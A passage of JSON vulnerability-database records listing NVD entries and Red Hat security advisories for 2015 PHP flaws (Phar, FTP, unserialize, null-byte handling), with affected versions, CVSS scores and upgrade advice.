"cpe:/a:php:php:5.5.0:alpha4", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:php:php:5.5.0", "cpe:/a:php:php:5.6.0:alpha1", "cpe:/a:php:php:5.5.1", "cpe:/a:php:php:5.5.0:beta1", "cpe:/a:php:php:5.5.23", "cpe:/a:php:php:5.5.24", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/a:php:php:5.5.22", "cpe:/o:oracle:linux:6.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/a:php:php:5.5.0:alpha2", "cpe:/a:php:php:5.6.6", "cpe:/a:php:php:5.5.0:alpha1", "cpe:/a:php:php:5.6.0:alpha2", "cpe:/o:redhat:enterprise_linux:6", "cpe:/a:php:php:5.5.5", "cpe:/a:php:php:5.4.39", "cpe:/o:oracle:linux:7.0", "cpe:/a:php:php:5.5.2", "cpe:/o:redhat:enterprise_linux_server_eus:7.1", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.1", "cpe:/a:php:php:5.6.5", "cpe:/a:php:php:5.5.8", "cpe:/a:php:php:5.5.11", "cpe:/a:php:php:5.5.6", "cpe:/a:php:php:5.6.0:beta2", "cpe:/a:php:php:5.5.0:alpha3", "cpe:/a:php:php:5.5.14", "cpe:/a:php:php:5.6.0:alpha4", "cpe:/a:php:php:5.5.9", "cpe:/a:php:php:5.6.2"], "modified": "2018-01-04T21:30:07", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4024", "id": "CVE-2015-4024", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-05T11:51:41", "references": ["http://php.net/ChangeLog-5.php", "http://www.securityfocus.com/bid/74700", "http://www.debian.org/security/2015/dsa-3280", "http://rhn.redhat.com/errata/RHSA-2015-1186.html", "https://support.apple.com/kb/HT205031", "http://rhn.redhat.com/errata/RHSA-2015-1219.html", "http://www.securitytracker.com/id/1032433", "http://lists.opensuse.org/opensuse-updates/2015-06/msg00002.html", "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html", "https://security.gentoo.org/glsa/201606-10", "https://bugs.php.net/bug.php?id=69453", "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/159031.html", "http://rhn.redhat.com/errata/RHSA-2015-1135.html", "http://rhn.redhat.com/errata/RHSA-2015-1187.html", "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/158616.html", "http://lists.apple.com/archives/security-announce/2015/Aug/msg00001.html", "http://rhn.redhat.com/errata/RHSA-2015-1218.html", "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/158915.html"], "edition": 3, "description": "The phar_parse_tarfile function in ext/phar/tar.c in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 does not verify that the first character of a filename is different from the \\0 character, which allows remote attackers to cause a denial of service (integer underflow and memory corruption) via a crafted entry in a tar archive.", "reporter": "NVD", "published": "2015-06-09T14:59:04", "title": "CVE-2015-4021", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-4021"], "scanner": [], "cpe": ["cpe:/o:apple:mac_os_x:10.10.4", "cpe:/a:php:php:5.5.10", "cpe:/a:php:php:5.5.0:beta3", "cpe:/a:php:php:5.5.0:beta4", "cpe:/a:php:php:5.5.12", "cpe:/a:php:php:5.6.0:alpha3", "cpe:/a:php:php:5.6.3", "cpe:/a:php:php:5.5.0:alpha5", "cpe:/a:php:php:5.5.0:rc2", "cpe:/a:php:php:5.5.21", "cpe:/a:php:php:5.5.13", "cpe:/a:php:php:5.5.20", "cpe:/a:php:php:5.5.4", "cpe:/a:php:php:5.5.0:beta2", "cpe:/a:php:php:5.4.40", "cpe:/a:php:php:5.5.7", "cpe:/a:php:php:5.6.0:beta3", "cpe:/a:php:php:5.6.0:beta4", "cpe:/a:php:php:5.6.0:alpha5", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:php:php:5.6.0:beta1", "cpe:/a:php:php:5.6.7", "cpe:/a:php:php:5.6.4", "cpe:/a:php:php:5.5.19", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/a:php:php:5.5.3", "cpe:/a:php:php:5.5.18", "cpe:/a:php:php:5.6.8", "cpe:/a:php:php:5.5.0:rc1", "cpe:/a:php:php:5.5.0:alpha6", "cpe:/a:php:php:5.5.0:alpha4", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:php:php:5.5.0", "cpe:/a:php:php:5.6.0:alpha1", "cpe:/a:php:php:5.5.1", "cpe:/a:php:php:5.5.0:beta1", "cpe:/a:php:php:5.5.23", "cpe:/a:php:php:5.5.24", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/a:php:php:5.5.22", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/a:php:php:5.5.0:alpha2", "cpe:/a:php:php:5.6.6", "cpe:/a:php:php:5.5.0:alpha1", "cpe:/a:php:php:5.6.0:alpha2", "cpe:/o:redhat:enterprise_linux:6", "cpe:/a:php:php:5.5.5", "cpe:/a:php:php:5.4.39", "cpe:/a:php:php:5.5.2", "cpe:/o:redhat:enterprise_linux_server_eus:7.1", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.1", "cpe:/a:php:php:5.6.5", "cpe:/a:php:php:5.5.8", "cpe:/a:php:php:5.5.11", "cpe:/a:php:php:5.5.6", "cpe:/a:php:php:5.6.0:beta2", "cpe:/a:php:php:5.5.0:alpha3", "cpe:/a:php:php:5.5.14", "cpe:/a:php:php:5.6.0:alpha4", "cpe:/a:php:php:5.5.9", "cpe:/a:php:php:5.6.2"], "modified": "2018-01-04T21:30:07", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4021", "id": "CVE-2015-4021", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-05T11:51:41", "references": ["http://php.net/ChangeLog-5.php", "https://bugs.php.net/bug.php?id=69545", "http://www.debian.org/security/2015/dsa-3280", "http://rhn.redhat.com/errata/RHSA-2015-1186.html", "https://support.apple.com/kb/HT205031", "http://rhn.redhat.com/errata/RHSA-2015-1219.html", "http://www.securitytracker.com/id/1032433", "http://lists.opensuse.org/opensuse-updates/2015-06/msg00002.html", "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html", "https://security.gentoo.org/glsa/201606-10", "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/159031.html", "http://rhn.redhat.com/errata/RHSA-2015-1135.html", "http://rhn.redhat.com/errata/RHSA-2015-1187.html", "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/158616.html", "http://lists.apple.com/archives/security-announce/2015/Aug/msg00001.html", "http://www.securityfocus.com/bid/74902", "http://rhn.redhat.com/errata/RHSA-2015-1218.html", "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/158915.html"], "edition": 3, "description": "Integer overflow in the ftp_genlist function in ext/ftp/ftp.c in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 allows remote FTP servers to execute arbitrary code via a long reply to a LIST command, leading to a heap-based buffer overflow.", "reporter": "NVD", "published": "2015-06-09T14:59:05", "title": "CVE-2015-4022", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-4022"], "scanner": [], "cpe": ["cpe:/o:apple:mac_os_x:10.10.4", "cpe:/a:php:php:5.5.10", "cpe:/a:php:php:5.5.0:beta3", "cpe:/a:php:php:5.5.0:beta4", "cpe:/a:php:php:5.5.12", "cpe:/a:php:php:5.6.0:alpha3", "cpe:/a:php:php:5.6.3", "cpe:/a:php:php:5.5.0:alpha5", "cpe:/a:php:php:5.5.0:rc2", "cpe:/a:php:php:5.5.21", "cpe:/a:php:php:5.5.13", "cpe:/a:php:php:5.5.20", "cpe:/a:php:php:5.5.4", "cpe:/a:php:php:5.5.0:beta2", "cpe:/a:php:php:5.4.40", "cpe:/a:php:php:5.5.7", "cpe:/a:php:php:5.6.0:beta3", "cpe:/a:php:php:5.6.0:beta4", "cpe:/a:php:php:5.6.0:alpha5", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:php:php:5.6.0:beta1", "cpe:/a:php:php:5.6.7", "cpe:/a:php:php:5.6.4", "cpe:/a:php:php:5.5.19", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/a:php:php:5.5.3", "cpe:/a:php:php:5.5.18", "cpe:/a:php:php:5.6.8", "cpe:/a:php:php:5.5.0:rc1", "cpe:/a:php:php:5.5.0:alpha6", "cpe:/a:php:php:5.5.0:alpha4", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:php:php:5.5.0", "cpe:/a:php:php:5.6.0:alpha1", "cpe:/a:php:php:5.5.1", "cpe:/a:php:php:5.5.0:beta1", "cpe:/a:php:php:5.5.23", "cpe:/a:php:php:5.5.24", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/a:php:php:5.5.22", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/a:php:php:5.5.0:alpha2", "cpe:/a:php:php:5.6.6", "cpe:/a:php:php:5.5.0:alpha1", "cpe:/a:php:php:5.6.0:alpha2", "cpe:/o:redhat:enterprise_linux:6", "cpe:/a:php:php:5.5.5", "cpe:/a:php:php:5.4.39", "cpe:/a:php:php:5.5.2", "cpe:/o:redhat:enterprise_linux_server_eus:7.1", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.1", "cpe:/a:php:php:5.6.5", "cpe:/a:php:php:5.5.8", "cpe:/a:php:php:5.5.11", "cpe:/a:php:php:5.5.6", "cpe:/a:php:php:5.6.0:beta2", "cpe:/a:php:php:5.5.0:alpha3", "cpe:/a:php:php:5.5.14", "cpe:/a:php:php:5.6.0:alpha4", "cpe:/a:php:php:5.5.9", "cpe:/a:php:php:5.6.2"], "modified": "2018-01-04T21:30:07", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4022", "id": "CVE-2015-4022", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-05T11:51:41", "references": ["http://php.net/ChangeLog-5.php", "http://www.securityfocus.com/bid/75056", "http://www.debian.org/security/2015/dsa-3280", "http://rhn.redhat.com/errata/RHSA-2015-1186.html", "https://support.apple.com/kb/HT205031", "http://rhn.redhat.com/errata/RHSA-2015-1219.html", "https://bugs.php.net/bug.php?id=68598", "http://lists.opensuse.org/opensuse-updates/2015-06/msg00002.html", "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html", "https://security.gentoo.org/glsa/201606-10", "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/159031.html", "http://rhn.redhat.com/errata/RHSA-2015-1135.html", "http://rhn.redhat.com/errata/RHSA-2015-1187.html", "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/158616.html", "http://www.securitytracker.com/id/1032431", "http://lists.apple.com/archives/security-announce/2015/Aug/msg00001.html", "http://rhn.redhat.com/errata/RHSA-2015-1218.html", "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/158915.html"], "edition": 3, "description": "The pcntl_exec implementation in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 truncates a pathname upon encountering a \\x00 character, which might allow remote attackers to bypass intended extension restrictions and execute files with unexpected names via a crafted first argument. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-7243.", "reporter": "NVD", "published": "2015-06-09T14:59:08", "title": "CVE-2015-4026", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-4026"], "scanner": [], "cpe": ["cpe:/o:apple:mac_os_x:10.10.4", "cpe:/a:php:php:5.5.10", "cpe:/a:php:php:5.5.0:beta3", "cpe:/a:php:php:5.5.0:beta4", "cpe:/a:php:php:5.5.12", "cpe:/a:php:php:5.6.0:alpha3", "cpe:/a:php:php:5.6.3", "cpe:/a:php:php:5.5.0:alpha5", "cpe:/a:php:php:5.5.0:rc2", "cpe:/a:php:php:5.5.21", "cpe:/a:php:php:5.5.13", "cpe:/a:php:php:5.5.20", "cpe:/a:php:php:5.5.4", "cpe:/a:php:php:5.5.0:beta2", "cpe:/a:php:php:5.4.40", "cpe:/a:php:php:5.5.7", "cpe:/a:php:php:5.6.0:beta3", "cpe:/a:php:php:5.6.0:beta4", "cpe:/a:php:php:5.6.0:alpha5", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:php:php:5.6.0:beta1", "cpe:/a:php:php:5.6.7", "cpe:/a:php:php:5.6.4", "cpe:/a:php:php:5.5.19", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/a:php:php:5.5.3", "cpe:/a:php:php:5.5.18", "cpe:/a:php:php:5.6.8", "cpe:/a:php:php:5.5.0:rc1", "cpe:/a:php:php:5.5.0:alpha6", "cpe:/a:php:php:5.5.0:alpha4", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:php:php:5.5.0", "cpe:/a:php:php:5.6.0:alpha1", "cpe:/a:php:php:5.5.1", "cpe:/a:php:php:5.5.0:beta1", "cpe:/a:php:php:5.5.23", "cpe:/a:php:php:5.5.24", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/a:php:php:5.5.22", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/a:php:php:5.5.0:alpha2", "cpe:/a:php:php:5.6.6", "cpe:/a:php:php:5.5.0:alpha1", "cpe:/a:php:php:5.6.0:alpha2", "cpe:/o:redhat:enterprise_linux:6", "cpe:/a:php:php:5.5.5", "cpe:/a:php:php:5.4.39", "cpe:/a:php:php:5.5.2", "cpe:/o:redhat:enterprise_linux_server_eus:7.1", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.1", "cpe:/a:php:php:5.6.5", "cpe:/a:php:php:5.5.8", "cpe:/a:php:php:5.5.11", "cpe:/a:php:php:5.5.6", "cpe:/a:php:php:5.6.0:beta2", "cpe:/a:php:php:5.5.0:alpha3", "cpe:/a:php:php:5.5.14", "cpe:/a:php:php:5.6.0:alpha4", "cpe:/a:php:php:5.5.9", "cpe:/a:php:php:5.6.2"], "modified": "2018-01-04T21:30:08", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4026", "id": "CVE-2015-4026", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-12-11T21:41:41", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageName": "php54-php-debuginfo", "packageFilename": "php54-php-debuginfo-5.4.40-3.el6.x86_64.rpm", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-4025, CVE-2015-4026, CVE-2015-4598)\n\nAn integer underflow flaw leading to out-of-bounds memory access was found\nin the way PHP's Phar extension parsed Phar archives. A specially crafted\narchive could cause PHP to crash or, possibly, execute arbitrary code when\nopened. (CVE-2015-4021)\n\nAll php54-php users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After installing\nthe updated packages, the httpd service must be restarted for the update\nto take effect.\n", "reporter": "RedHat", "published": "2015-07-09T04:00:00", "type": "redhat", "title": "(RHSA-2015:1219) Moderate: php54-php security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-4021", "CVE-2015-4022", "CVE-2015-4024", "CVE-2015-4025", "CVE-2015-4026", "CVE-2015-4598"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-13T01:28:19", "id": "RHSA-2015:1219", "href": "https://access.redhat.com/errata/RHSA-2015:1219", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-12-11T21:41:47", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.6.5-7.el6", "arch": "x86_64", "packageName": "rh-php56-php-debuginfo", "packageFilename": "rh-php56-php-debuginfo-5.6.5-7.el6.x86_64.rpm", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-4025, CVE-2015-4026, CVE-2015-3411,\nCVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2783,\nCVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP's File Information (fileinfo) extension.\nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2015-4604,\nCVE-2015-4605)\n\nAll rh-php56-php users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After installing\nthe updated packages, the httpd24-httpd service must be restarted for the\nupdate to take effect.\n", "reporter": "RedHat", "published": "2015-06-25T04:00:00", "type": "redhat", "title": "(RHSA-2015:1187) Important: rh-php56-php security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-2783", "CVE-2015-3307", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-3411", "CVE-2015-3412", "CVE-2015-4021", "CVE-2015-4022", "CVE-2015-4024", "CVE-2015-4025", "CVE-2015-4026", "CVE-2015-4598", "CVE-2015-4602", "CVE-2015-4603", "CVE-2015-4604", "CVE-2015-4605"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-13T01:28:27", "id": "RHSA-2015:1187", "href": "https://access.redhat.com/errata/RHSA-2015:1187", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T19:43:11", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.5.21-4.el6", "arch": "x86_64", "packageName": "php55-php-debuginfo", "packageFilename": "php55-php-debuginfo-5.5.21-4.el6.x86_64.rpm", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-4025, CVE-2015-4026, CVE-2015-3411,\nCVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2783,\nCVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP's File Information (fileinfo) extension.\nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2015-4604,\nCVE-2015-4605)\n\nAll php55-php users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After installing\nthe updated packages, the httpd24-httpd service must be restarted for the\nupdate to take effect.\n", "reporter": "RedHat", "published": "2015-06-25T04:00:00", "type": "redhat", "title": "(RHSA-2015:1186) Important: php55-php security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-2783", "CVE-2015-3307", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-3411", "CVE-2015-3412", "CVE-2015-4021", "CVE-2015-4022", "CVE-2015-4024", "CVE-2015-4025", "CVE-2015-4026", "CVE-2015-4598", "CVE-2015-4602", "CVE-2015-4603", "CVE-2015-4604", "CVE-2015-4605"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-13T01:28:16", "id": "RHSA-2015:1186", "href": "https://access.redhat.com/errata/RHSA-2015:1186", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T19:42:20", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-debuginfo", "packageFilename": "php-debuginfo-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2015-0273, CVE-2015-2787, CVE-2015-4147,\nCVE-2015-4148, CVE-2015-4599, CVE-2015-4600, CVE-2015-4601, CVE-2015-4602,\nCVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-4026, CVE-2015-3411, CVE-2015-3412,\nCVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nA double free flaw was found in zend_ts_hash_graceful_destroy() function in\nthe PHP ZTS module. This flaw could possibly cause a PHP application to\ncrash. (CVE-2014-9425)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\n", "reporter": "RedHat", "published": "2015-07-09T04:00:00", "type": "redhat", "title": "(RHSA-2015:1218) Moderate: php security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-9425", "CVE-2014-9705", "CVE-2014-9709", "CVE-2015-0232", "CVE-2015-0273", "CVE-2015-2301", "CVE-2015-2783", "CVE-2015-2787", "CVE-2015-3307", "CVE-2015-3329", "CVE-2015-3411", "CVE-2015-3412", "CVE-2015-4021", "CVE-2015-4022", "CVE-2015-4024", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-4148", "CVE-2015-4598", "CVE-2015-4599", "CVE-2015-4600", "CVE-2015-4601", "CVE-2015-4602", "CVE-2015-4603"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T08:58:11", "id": "RHSA-2015:1218", "href": "https://access.redhat.com/errata/RHSA-2015:1218", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:41:45", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageName": "php-debuginfo", "packageFilename": "php-debuginfo-5.4.16-36.el7_1.x86_64.rpm", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600,\nCVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026,\nCVE-2015-3411, CVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP's File Information (fileinfo) extension.\nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2014-9652,\nCVE-2015-4604, CVE-2015-4605)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nThis update also fixes the following bugs:\n\n* The libgmp library in some cases terminated unexpectedly with a\nsegmentation fault when being used with other libraries that use the GMP\nmemory management. With this update, PHP no longer changes libgmp memory\nallocators, which prevents the described crash from occurring. (BZ#1212305)\n\n* When using the 